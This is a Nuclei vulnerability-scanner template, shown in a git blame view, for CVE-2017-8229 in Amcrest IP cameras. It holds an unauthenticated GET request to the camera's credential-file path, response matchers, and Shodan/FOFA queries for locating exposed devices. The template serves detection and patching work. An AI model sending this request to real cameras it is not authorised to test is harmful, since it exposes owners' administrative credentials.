nuclei-templates/http/cves/2017/CVE-2017-8229.yaml

46 lines
1.2 KiB
YAML
Raw Normal View History

2023-08-10 05:18:14 +00:00
id: CVE-2017-8229
info:
name: Amcrest IP Camera Web Management - Data Exposure
author: pussycat0x
severity: critical
description: |
2023-08-10 05:53:25 +00:00
Amcrest IPM-721S V2.420.AC00.16.R.20160909 devices allow an unauthenticated attacker to download the administrative credentials.
2023-08-10 05:18:14 +00:00
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-8229
2023-08-10 05:53:25 +00:00
- http://packetstormsecurity.com/files/153224/Amcrest-IPM-721S-Credential-Disclosure-Privilege-Escalation.html
- https://github.com/ethanhunnt/IoT_vulnerabilities/blob/master/Amcrest_sec_issues.pdf
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-255
2023-08-10 05:18:14 +00:00
metadata:
max-request: 1
fofa-query: "Amcrest"
2023-08-10 05:53:25 +00:00
shodan-query: html:"Amcrest"
verified: true
2023-08-10 05:18:14 +00:00
tags: cve,cve2017,amcrest,iot
http:
- method: GET
path:
2023-08-10 05:53:25 +00:00
- "{{BaseURL}}/current_config/Sha1Account1"
2023-08-10 05:18:14 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DevInformation"
- "SerialID"
condition: and
2023-08-10 05:53:25 +00:00
- type: word
part: header
words:
- "application/octet-stream"
2023-08-10 05:18:14 +00:00
- type: status
status:
- 200